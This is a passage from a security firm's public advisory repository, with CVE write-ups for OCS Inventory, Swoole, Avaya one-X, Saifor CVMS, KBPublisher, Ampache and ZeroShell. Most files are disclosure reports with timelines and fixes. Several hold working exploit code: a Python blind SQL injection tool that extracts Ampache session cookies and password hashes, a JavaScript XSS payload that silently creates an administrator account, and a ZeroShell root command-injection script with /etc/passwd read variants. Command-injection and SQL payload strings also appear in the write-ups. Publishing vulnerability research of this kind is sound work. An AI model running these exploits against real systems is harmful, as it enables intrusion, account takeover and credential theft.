24 | By not filtering properly, we can break the sentence with a single quote (‘) and inject our payload.
25 |
26 | * Parameters length, order and start. These parameters used for the limit and order clauses of the SQL statement are not filtered properly, allowing the execution of arbitrary queries in the same way:
27 | ```
28 | (Example: POST parameter length)
29 | ... GROUP BY netid) non_ident on non_ident.RSX=inv.RSX) toto order by ID asc limit 0 ,[inject here]
30 | ```
31 | ## Impact
32 | An attacker can execute arbitrary SQL queries in the backend.
33 |
34 | ## Recommendation
35 | Update the software to last version.
36 |
37 | ## Timeline
38 |
39 | * 05/06/2018 - Reported vulnerability to vendor
40 | * 05/06/2018 - Vendor ACK
41 | * 14/06/2018 - First fix attempt (bypassed)
42 | * 02/07/2018 - Correct fix
43 | * 30/07/2018 - Security Release with fix (OCS Inventory 2.5)
44 |
45 |
46 | #
47 |
48 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
49 |
--------------------------------------------------------------------------------
/2018/CVE-2018-12483/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-12483: Remote Command Execution in OCS Inventory
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ OCS Inventory
6 | __Vendor URL:__ https://ocsinventory-ng.org
7 | __Versions affected:__ OCS Inventory <= 2.4.1
8 | __Discovered by:__ Jaume Llopis ([@JKS___](https://twitter.com/JKS___))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 | ## Summary
13 | An authenticated attacker can execute system commands via command injection in IP Discover functionality.
14 |
15 | ## Details
16 | In IP Discovery functionality:
17 | ```php
18 | function runCommand($command = "", $fname) {
19 | $command = "perl ipdiscover-util.pl $command -xml -h=" . SERVER_READ . " -u=" . COMPTE_BASE . " -p=" . PSWD_BASE . " -d=" . DB_NAME . " -path=" . $fname;
20 | exec($command);
21 | }
22 | ```
23 | The perl script is executed as a system command via exec() function, where it takes as argument a text string where the parameters have been concatenated:
24 | ```php
25 | //ms_ipdiscover_analyse.php
26 | $pas = $protectedGet['rzo'];
27 | $values = look_config_default_values(array('IPDISCOVER_IPD_DIR'), '', array('IPDISCOVER_IPD_DIR' => array('TVALUE' => VARLIB_DIR)));
28 | $fname = $values['tvalue']['IPDISCOVER_IPD_DIR'];
29 | $file_name = $fname . "/ipd/" . $pas . ".ipd";
30 | //reset cache?
31 | if (is_defined($protectedPost['reset'])) {
32 | unlink($file_name);
33 | reloadform_closeme('', true);
34 | } else {
35 | if (!is_readable($file_name))
36 | runCommand("-cache -net=" . $pas, $fname);
37 | ```
38 | The parameters provided to the runCommand function lack any filtering, so it is possible to abuse this functionality in order to execute arbitrary commands in the OS. Since we have the control of $pas (as it acquires its value from the GET parameter “rzo”), we can insert commands by the creation of a string like this one:
39 |
40 | ```bash
41 | perl ipdiscover-util.pl -cache -net=;id > /tmp/pwned;#-xml -h=...
42 | ```
43 | ## Impact
44 | An authenticated attacker can execute arbitrary system commands. This can be exploited inside the a valid session via CSRF.
45 |
46 | ## Recommendation
47 | Update to last version.
48 |
49 | ## Timeline
50 |
51 | * 05/06/2018 - Reported vulnerability to vendor
52 | * 05/06/2018 - Vendor ACK
53 | * 14/06/2018 - First fix attempt (bypassed)
54 | * 02/07/2018 - Correct fix
55 | * 30/07/2018 - Security Release with fix (OCS Inventory 2.5)
56 |
57 |
58 | #
59 |
60 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2018/CVE-2018-14473/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-14473: XML External Entity (XXE) in OCS Inventory
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ OCS Inventory
6 | __Vendor URL:__ https://ocsinventory-ng.org
7 | __Versions affected:__ OCS Inventory <= 2.4.1
8 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2018/CVE-2018-14473/))
11 |
12 |
13 |
14 | ## Summary
15 | Due to an inadequate configuration it is possible to use external entities, which when processed by the XML parser, allow the exfiltration of sensitive information from the machine.
16 |
17 | ## Details
18 | The communication between the agents and the master server of OCS Inventory is done through the HTTP protocol, sending the information against an endpoint. The information is structured in the form of XML, being parsed by the server to extract the data.
19 | As proof of concept, a local web server can be raised on the user’s machine, as a canary, and send the following request against the vulnerable endpoint:
20 |
21 | ```
22 | POST /ocsinventory HTTP/1.1
23 | Host: xxxxxxxxxxxxxxx
24 | User-Agent: OCS-NG_WINDOWS_AGENT_v2.3.1.1
25 | Accept: */*
26 | Content-Type: application/xml
27 | Content-Length: 160
28 | Expect: 100-continue
29 | Connection: close
30 |
31 |
33 |
34 | >
35 | &sp;
36 | ```
37 |
38 | When the XML is processed, the entity &sp; expands and the OCS Inventory server makes a request against our canary, verifying the existence of the vulnerability.
39 |
40 | ## Impact
41 | An attacker can exfiltrate sensitive information from the machine.
42 |
43 | ## Recommendation
44 | Update the software to last version.
45 |
46 | ## Timeline
47 |
48 | * 05/06/2018 - Reported vulnerability to vendor
49 | * 05/06/2018 - Vendor ACK
50 | * 14/06/2018 - First fix attempt (bypassed)
51 | * 02/07/2018 - Correct fix
52 | * 30/07/2018 - Security Release with fix (OCS Inventory 2.5)
53 |
54 |
55 | #
56 |
57 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2018/CVE-2018-15503/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-15503: Memory corruption via deserialization in Swoole
2 | []() []() []()
3 |
4 | __Vendor:__ Swoole
5 | __Vendor URL:__ https://www.swoole.co.uk
6 | __Versions affected:__ Swoole <= 4.0.4
7 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/thexc3ll))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ Yes ([ref](https://github.com/X-C3LL/PoC-CVEs/tree/master/CVE-2018-15503))
10 | ## Summary
11 | The unpack implementation in Swoole version 4.0.4 lacks correct size checks in the deserialization process. An attacker can craft a serialized object to exploit this vulnerability and cause a memory corruption.
12 |
13 | ## Details
14 | Proof of concept to leak 255 bytes:
15 |
16 | ```php
17 | unpack($sor);
22 | echo "[+] Swoole Unserialized:\n";
23 | var_dump($ser);
24 | echo "[+] Memory Leaked:\n";
25 | $keys = key(get_object_vars($ser[1]));
26 | echo bin2hex($keys);
27 | echo "\n[+] Size: \n";
28 | echo strlen($keys);
29 | ?>
30 | ```
31 | ## Impact
32 | This vulnerability can be abused to bypass server mitigations and execute arbitrary code.
33 |
34 | ## Recommendation
35 | Update to last version.
36 |
37 | ## Timeline
38 | * 14/08/2018 - Reported vulnerability to vendor
39 | * 15/08/2018 - Fix released in Github
40 |
41 | #
42 |
43 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
44 |
--------------------------------------------------------------------------------
/2018/CVE-2018-15610/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-15610: Avaya one-X portal arbitrary OS file access
2 | []() []() []()
3 |
4 | __Vendor:__ Avaya
5 | __Vendor URL:__ https://support.avaya.com/products/P0482/avaya-onex-portal
6 | __Versions affected:__ Multiple versions and products (check the details section to view the full list)
7 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 | one-X Portal for IP Office is an application that runs on a web server connected to the IP Office telephone system. Using a web browser, one can access
14 | the one-X Portal for IP Office and use it to perform actions such as:
15 |
16 | * Control your telephone calls
17 | * View details of calls and directories of contacts
18 | * Configure settings that affect how your calls are treated by the telephone system
19 | * Conference calls
20 | * Manage your voicemail messages
21 |
22 | ## Details
23 | Avaya one-x for ip office contains a default low privileged account, which has limited access to the application, where it's intended to perform backup duties.
24 |
25 | An arbitrary file download issue was found in the backup portal, affecting to either Linux and Windows versions of the 9.x, 10.0.x and 10.1.x series. An
26 | authenticated remote attacker could send specially crafted request leading into potential information disclosure and DoS.
27 |
28 | DownloadToLocalDriveServlet allows to download any operating system file.
29 |
30 | ```
31 | <<>>
32 | GET /path/to/DownloadToLocalDriveServlet**REDACTED** HTTP/1.1
33 | Host: 192.168.1.38
34 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
35 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
36 | Accept-Language: en-US,en;q=0.5
37 | Accept-Encoding: gzip, deflate
38 | Referer: https://192.168.1.38/onexportal-afa.html
39 | Cookie: JSESSIONID=740B74DC4B77E0B8EB8F4FED6BA5EAE8;
40 | Connection: close
41 | Upgrade-Insecure-Requests: 1
42 |
43 | <<>>
44 | HTTP/1.1 200 OK
45 | Server: Apache-Coyote/1.1
46 | Content-Disposition: attachment; filename=passwd;
47 | Content-Type: application/zip
48 | Date: Mon, 19 Mar 2018 20:38:39 GMT
49 | Connection: close
50 | Content-Length: 1910
51 |
52 | root:x:0:0:root:/root:/bin/bash
53 | bin:x:1:1:bin:/bin:/sbin/nologin
54 | daemon:x:2:2:daemon:/sbin:/sbin/nologin
55 | adm:x:3:4:adm:/var/adm:/sbin/nologin
56 | lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
57 | sync:x:5:0:sync:/sbin:/bin/sync
58 | ...
59 | ```
60 |
61 | This request also deletes de file after being downloaded (depending on the OS file and process permissions). Be carefull on Windows version as process runs with
62 | system privileges.
63 |
64 | Vulnerable piece of code:
65 |
66 | ```php
67 | if (sessionManager.isSessionAlive(session)) {
68 | String folder = req.getParameter("folder");
69 | String filename = req.getParameter("filename");
70 | if (logger.isDebugEnabled()) logger.debug(new Object[] { "doGet(), folder:", Helper.reformatFolderPath(folder), ", filename: ", filename });
71 | BufferedOutputStream bos = null;
72 | FileInputStream in = null;
73 | try {
74 | resp.setContentType("application/zip");
75 | resp.setHeader("Content-Disposition", "attachment; filename=" + filename + ";");
76 | bos = new BufferedOutputStream(resp.getOutputStream());
77 | in = new FileInputStream(Helper.reformatFolderPath(folder) + filename)
78 |
79 | ```
80 |
81 |
82 | ## Impact
83 | This vulnerability can be use to download arbitrary files and even to cause a DoS due to file removal.
84 |
85 | ## Recommendation
86 | DownloadToLocalDriveServlet it is only intended to download backup zip files from server to the desktop. Backup file default folder it's predefined setting that
87 | appears as serverFolderForBackup directive on $TOMCAT\bin\inyama-user.xml file, and therefore do not need to be passed through GET parameter.
88 |
89 | ```php
90 | String serverFolder = loggedInUser.getServerFolder() + File.separator;
91 | File downloadedFile = new File(Helper.reformatFolderPath(serverFolder), fileName);
92 | ```
93 |
94 | - Implement file type checks and enforce/append .zip extension (this is also recomended for UploadFromLocalServlet.class which allows arbitrary file upload,
95 | but at least enforces destination folder)
96 |
97 | - Avoid sending filename as GET or ensure path traversal protection is in place
98 |
99 | https://downloads.avaya.com/css/P8/documents/101051984
100 |
101 | * For 10.0.x, upgrade to IP Office one-X portal 10.0.702.16
102 | * For 10.1.x, upgrade to IP Office one-X portal 10.1.300.12
103 | * Fix is also provided in 11.0 or later
104 |
105 | Avaya strongly recommends following networking and security best practices by implementing firewalls, ACLs, physical security or other appropriate access restrictions. Though Avaya believes such restrictions should always be in place, risk to Avaya products and the surrounding network from this potential
106 | vulnerability may be mitigated by ensuring these practices are implemented until such time as an Avaya provided product update or the recommended Avaya action is applied. Further restrictions as deemed necessary based on the customer's security policies may be required during this interim period, but the
107 | System Product operating system or application should not be modified unless the change is approved by Avaya. Making changes that are not approved may void the Avaya product service contract.
108 |
109 | ## Timeline
110 | * 18/03/2018 - Vuln discovered during pentest engagement
111 | * 19/03/2018 - Avaya product security contacted
112 | * 19/03/2018 - Avaya product security replied
113 | * 23/03/2018 - Avaya product security confirmed and planned fix
114 | * 23/07/2018 - Fix available to customers
115 | * 31/08/2018 - Public disclosure
116 |
117 | (Kudos to the ProducSec Team, for the excelent communication and incident handling)
118 |
119 |
120 | #
121 |
122 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
123 |
--------------------------------------------------------------------------------
/2018/CVE-2018-6792/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-6792: Multiple SQL injections in Saifor CVMS Hub
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ Saifor
6 | __Vendor URL:__ http://saifor.com
7 | __Versions affected:__ CVMS Hub <= 1.3.1
8 | __Discovered by:__ José Manuel Aparicio ([@jm_aparicio](https://twitter.com/jm_aparicio))
9 | __Public fix:__ No
10 | __Proof of Concept:__ No
11 |
12 | ## Summary
13 | An attacker can execute arbitrary SQL queries because the application does not validate the parameters received.
14 |
15 | ## Details
16 | Multiple SQL injection vulnerabilites in CVMS HUB 1.3.1 allow an authenticated user to execute arbitrary SQL queries via multiple POST parameters to /cvms-hub/privado/seccionesmib/secciones.xhtml.
17 |
18 | The following parameteres are prone to be vulnerable:
19 | ```
20 | formularioGestionarSecciones:tablaSeccionesMib:j_idt118:filter
21 | formularioGestionarSecciones:tablaSeccionesMib:j_idt120:filter
22 | formularioGestionarSecciones:tablaSeccionesMib:j_idt122:filter
23 | formularioGestionarSecciones:tablaSeccionesMib:j_idt124:filter
24 | formularioGestionarSecciones:tablaSeccionesMib:j_idt126:filter
25 | formularioGestionarSecciones:tablaSeccionesMib:j_idt128:filter
26 | formularioGestionarSecciones:tablaSeccionesMib:j_idt130:filter
27 | ```
28 |
29 | Likewise, SQL injection exists in /cvms-hub/privado/seccionesmib/secciones.xhtml via GET parameter 'nombreAgente'.
30 |
31 | ## Impact
32 | An attacker can execute arbitrary SQL queries in the backend.
33 |
34 | ## Recommendation
35 | There is no fixes for this vulnerability.
36 |
37 | ## Timeline
38 | * 21/12/2017 - Vulnerability reported to vendor (No response)
39 | * 23/01/2018 - Vulnerability reported to vendor (No Response)
40 | * 06/02/2018 - Full disclosure after 45 days (https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm)
41 |
42 | #
43 |
44 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
45 |
--------------------------------------------------------------------------------
/2019/CVE-2019-10687/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-10687: Multiple SQL Injection in KBPublisher
2 | ## Software
3 | []() []() []()
4 |
5 | __Vendor:__ KBPublisher
6 | __Vendor URL:__ https://www.kbpublisher.com
7 | __Versions affected:__ KBPublisher 6.0.2.1
8 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 |
13 | ## Summary
14 | KBPublisher release 6.0.2, and probably prior versions, contain multiple SQLi vulnerabilities that affect not only the admin interface but also the public (unauthenticated)
15 | area of the application.
16 |
17 | ## Details
18 |
19 | Affected URL's from the admin area (also affecting to POST parameters):
20 |
21 | ```
22 | https://SITE/admin/index.php?module=report&page=report_entry&entry_id%5B0%5D=325PAYLOAD&filter%5Bt%5D=1&ajax=1
23 | ```
24 |
25 | ```
26 | https://SITE/admin/index.php?module=log&page=login_log&action=detail&id=PAYLOAD
27 | ```
28 |
29 | The publicly accesible URL, correspond to the print feature:
30 |
31 | ```
32 | https://SITE/index.php?View=print&id%5B%5D=PAYLOAD
33 | ```
34 |
35 | ## Impact
36 | This vulnerability can be abused to extract users and password hashes from the database.
37 |
38 | ## Recommendation
39 | Upgrade to version 7.0 or higher.
40 |
41 | ## Timeline
42 | * 21/Mar/2019: - Vuln discovered during engagement.
43 | * 21/Mar/2019: - KBP product security contacted.
44 | * 22/Mar/2019: - Replied providing workarround.
45 | * 30/Apr/2019: - New release of KBP released to public.
46 | * 21/Ago/2019: - Public disclosure.
47 |
48 | #
49 |
50 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
51 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12385/CVE-2019-12385.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2019-12385.py - SQL Injection
4 | #
5 | # Software: Ampache <= 3.9.1
6 | # Author: Pablo Martinez (@xassiz) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/tree/master/2019/CVE-2019-12385
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import re
13 | import sys
14 | import string
15 | import requests
16 | import argparse
17 |
18 | class Ampawn():
19 |
20 | def __init__(self, url, cookie=None, proxy=None, debug=False):
21 | self.url = url
22 | self.cookies = { "ampache": cookie } if cookie else None
23 | self.proxy = proxy
24 | self.debug = debug
25 | self.headers = {
26 | "X-Requested-With": "XMLHttpRequest",
27 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36",
28 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
29 | "Accept-Encoding": "gzip, deflate",
30 | "Connection": "close"
31 | }
32 |
33 | def check(self, payload):
34 | url = "%s/search.php?type=song" % self.url
35 |
36 | data = {
37 | "limit": "0",
38 | "operator": "or",
39 | "rule_1": "last_play",
40 | "rule_1_operator": "1",
41 | "rule_1_input": "%s" % payload,
42 | "action": "search"
43 | }
44 | r = requests.post(url, headers=self.headers, cookies=self.cookies, data=data, proxies=self.proxy, allow_redirects=False)
45 |
46 | if r.status_code == 302:
47 | if r.headers.get('Location')[-10:] == '/login.php':
48 | print "[-] Auth failed"
49 | sys.exit(2)
50 | elif r.status_code != 200:
51 | print "[-] Error code: %d" % r.status_code
52 | sys.exit(3)
53 |
54 | return re.search('song_\d*"', r.text)
55 |
56 | def dump(self, pattern, size=26, charset=None):
57 | full = ''
58 | for p in range(size):
59 | c = charset
60 |
61 | while len(c) > 1:
62 | middle = len(c) // 2
63 | h0, h1 = c[:middle], c[middle:]
64 | payload = pattern % (p+1, h0.encode('hex'))
65 | c = h1 if self.check(payload) else h0
66 |
67 | full += c
68 |
69 | if self.debug:
70 | print "[debug] Partial result: %s" % full
71 |
72 | return full
73 |
74 | def is_vulnerable(self):
75 | pattern = '1))union select 1 from dual where %s--'
76 | return self.check(pattern % '1=1') and not self.check(pattern % '1=0')
77 |
78 | def get_user_session(self, condition):
79 | count = '1))union select 1 from dual where (select count(*) from session where %s)>0--' % condition
80 | if not self.check(count):
81 | return None
82 | else:
83 | pattern = '1))union select 1 from (select 1 from session where %s and LOCATE(SUBSTR(id,%%d,1),BINARY 0x%%s)=0 order by expire DESC limit 1)t--' % condition
84 | return self.dump(pattern, size=26, charset=string.lowercase + string.digits)
85 |
86 | def get_user_password_hash(self, condition):
87 | count = '1))union select 1 from dual where (select count(*) from user where %s)=1--' % condition
88 | if not self.check(count):
89 | return None
90 | else:
91 | pattern = '1))union select 1 from user where %s and LOCATE(SUBSTR(password,%%d,1),BINARY 0x%%s)=0 limit 1--' % condition
92 | return self.dump(pattern, size=64, charset='abcdef0123456789')
93 |
94 | def get_username_by_id(self, id):
95 | r = requests.get("%s/stats.php?action=show_user&user_id=%d" % (self.url, int(id)), headers=self.headers, cookies=self.cookies, proxies=self.proxy, allow_redirects=False)
96 |
97 | if r.status_code == 302:
98 | if r.headers.get('Location')[-10:] == '/login.php':
99 | print "[-] Auth failed"
100 | sys.exit(2)
101 | elif r.status_code != 200:
102 | print "[-] Error code: %d" % r.status_code
103 | sys.exit(3)
104 |
105 | try:
106 | res = re.search('Display Name\n(.*)even">\n(.*)<', r.text)
107 | return res.group(2).strip()
108 | except:
109 | return None
110 |
111 |
112 | if __name__ == '__main__':
113 |
114 | parser = argparse.ArgumentParser()
115 | parser.add_argument("--url", help="URL of the target Ampache instance", required=True)
116 | parser.add_argument("--session", help="Session ID (if auth required)")
117 | parser.add_argument("--proxy", help="Proxy (optional)")
118 | parser.add_argument("--check", help="Check if target is vulnerable", action='store_true')
119 | parser.add_argument("--debug", help="Print debug information", action='store_true')
120 | parser.add_argument("--get-session", help="Dumps a user session cookie ", action='store_true')
121 | parser.add_argument("--get-password", help="Dumps a user password hash", action='store_true')
122 | parser.add_argument("--user", help="Target username (default: user with id=1)")
123 | parser.add_argument("--id", help="Target user id (default: user with id=1)")
124 |
125 | args = parser.parse_args()
126 |
127 | proxy = {'http':args.proxy, 'https':args.proxy} if args.proxy else None
128 |
129 | if args.session:
130 | pwn = Ampawn(args.url, args.session, proxy=proxy, debug=args.debug)
131 | else:
132 | pwn = Ampawn(args.url, proxy=proxy, debug=args.debug)
133 |
134 | print "[+] Target: %s" % args.url
135 |
136 | if args.check:
137 | if pwn.is_vulnerable():
138 | print "[+] Target is vulnerable"
139 | else:
140 | print "[-] Target is not vulnerable"
141 | sys.exit(1)
142 |
143 | if args.user:
144 | condition = "username=0x%s" % args.user.encode('hex')
145 | print "[+] Retrieving info for user '%s'..." % args.user
146 | elif args.id:
147 | condition = "id=%s" % args.id
148 | print "[+] Retrieving info for user with id=%s..." % args.id
149 | username = pwn.get_username_by_id(args.id)
150 | if username:
151 | print "[+] Username: %s" % username
152 | else:
153 | condition = "id=1"
154 | args.id = 1
155 | print "[+] Retrieving info for user with id=1..."
156 | username = pwn.get_username_by_id(args.id)
157 | if username:
158 | print "[+] Username: %s" % username
159 |
160 | if args.get_session:
161 | if args.id:
162 | condition = 'username=(select username from user where %s)' % condition
163 |
164 | session_id = pwn.get_user_session(condition)
165 | if session_id:
166 | print "[+] Session = %s" % session_id
167 | else:
168 | print "[-] User has no active session"
169 |
170 | if args.get_password:
171 | hash = pwn.get_user_password_hash(condition)
172 | if hash:
173 | print "[+] Password = %s" % hash
174 | else:
175 | print "[-] User not found"
176 |
177 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12385/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-12385: SQL injection in Ampache
2 | ## Software
3 | []() []() []()
4 |
5 | __Vendor:__ Ampache
6 | __Vendor URL:__ http://ampache.org
7 | __Versions affected:__ Ampache <= 3.9.1
8 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-12385/CVE-2019-12385.py))
11 |
12 |
13 |
14 | ## Summary
15 | The search engine is affected by a SQL Injection, so any user able to perform lib/class/search.class.php searches (even guest users) can dump any data contained in the database (sessions, hashed passwords, etc.).
16 |
17 | ## Details
18 | Communication with the database is made via the Dba class (ORM), which relays on PHP PDO to perform queries. Some of them are performed properly using prepared statements, but in other cases the Dba::escape method is used.
19 |
20 | lib/class/dba.class.php:
21 |
22 | ```php
23 | 134: public static function escape($var)
24 | 135: {
25 | 136: $dbh = self::dbh();
26 | 137: if (!$dbh) {
27 | 138: debug_event('Dba', 'Wrong dbh.', 1);
28 | 139: exit;
29 | 140: }
30 | 141: $var = $dbh->quote($var);
31 | 142: // This is slightly less ugly than it was, but still ugly
32 | 143: return substr($var, 1, -1);
33 | 144: }
34 | ```
35 |
36 | This function calls PDO::quote, which filters special characters and quotes the string. After that, outer single quotes are stripped. The latter means that if this value is not quoted within the query, an attacker could inject data in SQL context.
37 |
38 | A vulnerable case supporting this theory is detailed below, although there could be more.
39 |
40 | lib/class/search.class.php:
41 |
42 | ```php
43 | 1461: case 'last_play':
44 | 1462: $userid = $GLOBALS['user']->id;
45 | 1463: $where[] = "`object_count`.`date` IS NOT NULL AND `object_count`.`date` $sql_match_operator (UNIX_TIMESTAMP() - ($input * 86400))";
46 | 1464: $join['object_count'] = true;
47 | 1465: break;
48 | ```
49 | The $input variable is basically:
50 | ```
51 | Dba::escape($USER_INPUT)
52 | ```
53 |
54 | So a malicious user could provide SQL commands (avoiding quotes and other special chars). The next request confirms the vulnerability, causing a 5-seconds delay:
55 |
56 | ```
57 | POST /search.php?type=song
58 | X-Requested-With: XMLHttpRequest
59 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
60 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
61 | Accept-Encoding: gzip, deflate
62 | Accept-Language: es-ES,es;q=0.9,en;q=0.8,pt;q=0.7
63 | Cookie: ampache=[session_id]
64 | Connection: close
65 |
66 | limit=0&operator=or&rule_1=last_play&rule_1_operator=1&rule_1_input=1))union+select+1+from+dual+where+sleep(5)--&action=search
67 | ```
68 |
69 |
70 | ## Impact
71 | This vulnerability may lead to a full compromise of admin accounts, when combined with the weak password generator algorithm used in the lostpassword functionality.
72 |
73 | ## Recommendation
74 | Update to last version.
75 |
76 | ## Timeline
77 |
78 | * 25/04/2019 - Reported vulnerability to vendor
79 | * 24/06/2019 - First fix attempt
80 | * 25/06/2019 - Incorrect fix notification
81 | * 25/06/2019 - Final fix at Github
82 |
83 | #
84 |
85 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
86 |
87 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12386/CVE-2019-12386.html:
--------------------------------------------------------------------------------
1 |
2 | CVE-2019-12386 - Stored XSS + CSRF
3 |
4 | Software: Ampache <= 3.9.1
5 | Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
6 | Details: https://github.com/blackarrowsec/advisories/new/master/2019/CVE-2019-12386
7 | Web: [www.blackarrow.net] - [www.tarlogic.com]
8 |
9 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12386/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-12386: Stored XSS in Ampache
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ Ampache
6 | __Vendor URL:__ http://ampache.org
7 | __Versions affected:__ Ampache <= 3.9.1
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-12386/CVE-2019-12386.html))
11 |
12 |
13 | ## Summary
14 | Ampache 3.9.1 (and before) is vulnerable to stored XSS because they user parameters are used without a properly sanitization.
15 |
16 | ## Details
17 |
18 | A stored XSS exists in the localplay.php LocalPlay "add instance" functionality. The injected code is reflected in the instances menu. This vulnerability can be abused to force an admin to create a new privileged user whose credentials are known by the attacker.
19 |
20 | ## Impact
21 | This vulnerability can be abused to force an admin to create a new privileged user whose credentials are known by the attacker.
22 |
23 | ## Recommendation
24 | Update to last version.
25 |
26 | ## Timeline
27 |
28 | * 25/04/2019 - Reported vulnerability to vendor
29 | * 24/06/2019 - First fix attempt
30 | * 25/06/2019 - Incorrect fix notification
31 | * 25/06/2019 - Final fix at Github
32 |
33 | #
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2019/CVE-2019-12386/pwn.js:
--------------------------------------------------------------------------------
1 | /*
2 | CVE-2019-12386: Stored XSS in Ampache
3 |
4 | Software: Ampache <= 3.9.1
5 | Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
6 | Details: https://github.com/blackarrowsec/advisories/new/master/2019/CVE-2019-12386
7 | Web: [www.blackarrow.net] - [www.tarlogic.com]
8 |
9 |
10 | */
11 |
12 | function pwned() {
13 | var ifr = document.getElementById("pwn");
14 | var target = ifr.contentDocument.getElementsByTagName("form")[2];
15 | target.username.value = "NewAdmin";
16 | target.email.value = "myemail@tarlogic.foobar";
17 | target.password_1.value = "admin";
18 | target.password_2.value = "admin";
19 | target.access.value = "100";
20 | target.submit();
21 | }
22 | var iframe = document.createElement('iframe');
23 | iframe.setAttribute("src", "https://[AMPACHE]/admin/users.php?action=show_add_user");
24 | iframe.setAttribute("id", "pwn");
25 | document.body.appendChild(iframe);
26 | setTimeout(pwned, 3000);
27 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12725/CVE-2019-12725.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2019-12725 - Remote Command Execution as Root
4 | #
5 | # Software: ZeroShell <= 3.9.0
6 | # Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/2019/CVE-2019-12725
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import requests
13 | import sys
14 |
15 | target = sys.argv[1]
16 | payload = "/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id"
17 | poc = "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a" + payload + "%0a'"
18 |
19 | # Vuln too: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type='%0acat /etc/passwd%0a'
20 | # And: /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat /etc/passwd%0a'&PW=
21 | # It the same vuln that https://www.exploit-db.com/exploits/41040 but bypassing the fix using %0a
22 |
23 | req = requests.get(target + poc)
24 | print req.text[:req.text.rindex("") / 2]
25 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12725/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-12725: Remote Command Execution in ZeroShell
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ ZeroShell
6 | __Vendor URL:__ https://zeroshell.org
7 | __Versions affected:__ ZeroShell <= 3.9.0
